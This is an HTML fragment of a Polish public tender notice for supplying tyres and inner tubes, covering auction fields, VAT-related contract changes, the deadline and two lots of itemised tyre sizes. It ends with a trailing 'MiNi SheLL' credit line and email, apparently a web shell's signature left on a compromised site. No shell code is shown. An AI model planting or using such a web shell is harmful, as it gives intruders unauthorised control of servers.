              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający dopuszcza możliwość zmiany postanowień umowy w stosunku do treści oferty, na podstawie którego dokonano wyboru wykonawcy jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów prawa określających wysokość stawki podatku VAT w zakresie cen jednostkowych podanych w ofercie (załącznik nr 2a lub 2b formularze asortymentowo - cenowe), to ceny te ulegną odpowiedniej zmianie. W takim przypadku wysokość wynagrodzenia Wykonawcy za każdym razem ustalana będzie z uwzględnieniem aktualnej stawki VAT obowiązującej w dniu powstania obowiązku podatkowego w rozumieniu przepisów o podatku od towarów i usług, chyba że zmienione przepisy stanowić będą odmiennie.

<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 14/10/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>Dostawa opon i dętek różnych<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie I Opony i dętki różne
1.Opona napędowa nowa 	265/70 R 17,5 szt.16
2.	Opona prowadząca nowa 	265/70 R 17,5 szt.8
3.	Opona prowadząca nowa 	215/75 R17,5 szt.2
4.	Opona letnia 	195/75 R16C szt. 6
5.	Opona zimowa nowa	195/75 R16C szt. 6
6.	Opona letnia nowa 	225/75 R 16 C szt. 12
7.	Opona zimowa nowa	225/75 R 16 C szt.12
8.	Opona napędowa nowa 	245/70 R 17,5 szt.8
9.	Opona zimowa nowa	195/65 R15 szt.	8
10.	Opona letnia nowa	195/70 R 15C szt.4
11.	Opona zimowa nowa	195/70 R15C szt.4
12.	Opona letnia nowa	225/70 R15C szt.4
13.	Opona zimowa nowa	225/70 R15C szt.4
14.	Opona letnia nowa	195/65 R15 szt.	8
15.	Opona prowadząca nowa 	305/70R 19,5 szt.2
16.	Opona napędowa nowa	305/70R 19,5 szt.4
17.	Opona prowadząca nowa 	265/70R 19,5 szt.2
18.	Opona napędowa nowa 	265/70R 19,5 szt.4
19.	Opona prowadząca nowa 	285/70R 19,5 szt.2
20.	Opona napędowa nowa 	285/70 R19,5 szt.4
21.	Opona prowadząca nowa 	10R 17,5 szt.2
22.	Opona napędowa nowa	10R 17,5 szt.4
23.	Opona nowa (przednia)	245/70R 17,5 szt.6
24.	Opona prowadząca nowa 	205/75R 17,5 szt.2
25.	Opona napędowa  nowa 	205/75R 17,5 szt.4
26.	Opona prowadząca nowa 	275/70R 22,5 szt.2
27.	Opona nowa z bieżnikiem naczepowym 425/65 R 22,5 szt.4
28.	Opona prowadząca nowa	12 R 22,5 szt.2
29.	Opona bieżnikowana napędowa	12 R 22,5 szt.6
30.	Opona prowadząca nowa 	315/70 R 22,5 szt.4
31.	Opona bieżnikowana napędowa	315/70 R 22,5 szt.12
32.	Opona prowadząca nowa 	385/65 R 22,5 szt.4
33.	Opona prowadząca nowa 	315/80 R 22,5 szt.12
34.	Opona napędowa bieżnikowana	315/80 R 22,5 szt.36
35.	Opona prowadząca nowa 	10 R 22,5 szt.2
36.	Opona napędowa bieżnikowana	10 R 22,5 szt.4
37.	Opona prowadząca nowa 	295/80 R 22,5 szt.2
38.	Opona napędowa nowa	295/80 R 22,5 szt.4
39.	Opona nowa CARGO C3 PLUS	385/65 R 22,5 szt.6
40.	Opona prowadząca nowa 	8,25 R 20 szt.2
41.	Opona napędowa bieżnikowana	8,25 R 20 szt.4
42.	Opona prowadząca nowa 	11 R 22,5 szt.4
43.	Opona napędowa bieżnikowana	11R 22,5 szt.10
44.	Opona prowadząca nowa 	900 R 20 szt.2
45.	Opona napędowa bieżnikowana	900 R 20 szt.4
46.	Opona letnia nowa 	205/65 R15 szt.	4
47.	Opona zimowa nowa	205/65 R15 szt.	4
48.	Opona napędowa nowa	225/75 R17,5 szt.4
49.	Opona letnia nowa	215/75 R 16C szt.4
50.	Opona zimowa nowa	215/75 R 16C szt.4
51.	Opona letnia nowa	215/70 R 15C szt.4
52.	Opona zimowa nowa	215/70 R 15C szt.4
53.	Opona rolnicza 	10,0/75-15,3 szt.4
54.	Opona rolnicza 	12,5/80-15,3 szt.4
55.	Opona rolnicza 	400/60-15,5 szt.10
56.	Opona rolnicza 	600-16 szt.6
57.	Opona rolnicza 	7,5-16 szt.2
58.	Opona rolnicza 	14,9 R28 szt.2
59.	Opona rolnicza 	12,4 R32 szt.2
60.	Opona rolnicza 	13,6 R 36 szt.2
61.	Opona rolnicza 	340/85 R24 szt.	2
62.	Opona rolnicza 	420/85 R 34 szt.2
63.	Opona rolnicza 	460/85 R 34 szt.2
64.	Opona rolnicza 	13,6 R 24 szt.2
65.	Opona nowa	400 R 22,5 szt.4
66.	Opona nowa prowadząca 	305/70 R22,5 szt.2
67.	Opona rolnicza 	16,5/85-24 szt.	2
68.	Dętka	8,25-15 szt.4
69.	Dętka	400/60-15,5 szt.15
70.	Dętka	10.0/75-15,3 szt.10
71.	Dętka	12,5/80-15,3 szt.10
72.	Dętka	6,00-16 szt.6
73.	Dętka	9,00-20 szt.2
74.	Dętka	6,50 - 16 szt.4
75.	Dętka	7,50 - 16 szt.2
76.	Dętka	12,5/80 - 18 szt.6
77.	Dętka	7,50 - 20 szt.2
78.	Dętka	8,25 - 20 szt.6
79.	Dętka	13,6 - 24 szt.2
80.	Dętka	18,4 - 26 szt.2
81.	Dętka	14,9 - 28 szt.4
82.	Dętka	13,6 - 36 szt.2
83.	Dętka	16,5/85 R24 szt. 4

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34352100-0, 34913200-2,
                    34351100-3,
                    19511200-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>95</td></tr><tr><td>Termin płatności</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>Dostawa opon przemysłowych<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie II opony przemysłowe
1.	Opona rolnicza 	11L-16SL szt.2
2.	Opona rolnicza 	16,9-28	szt.2
3.	Opona przemysłowa nowa	26,5 R25 szt.4
4.	Opona bieżnikowana (bieżnik jodełkowy)	10,00-20 szt.8
5.	Opona przemysłowa	20,5-25 szt.4
6.	Opona przemysłowa	12,5/80-18 szt.	2
7.	Opona przemysłowa	18,4-26 szt.2
8.	Opona pełna 	12,00-24 szt.8
9.	Opona pełna	7.00-12TL szt.6
10.	Opona pełna	6.00-9TL szt.6
11.	Opona przemysłowa	460/70 R24 szt.2
12.	Opona przemysłowa	340/80 R18 szt.	2

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34352100-0, 34913200-2,
                    34351100-3,
                    19511200-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 2<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>95</td></tr><tr><td>Termin płatności </td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com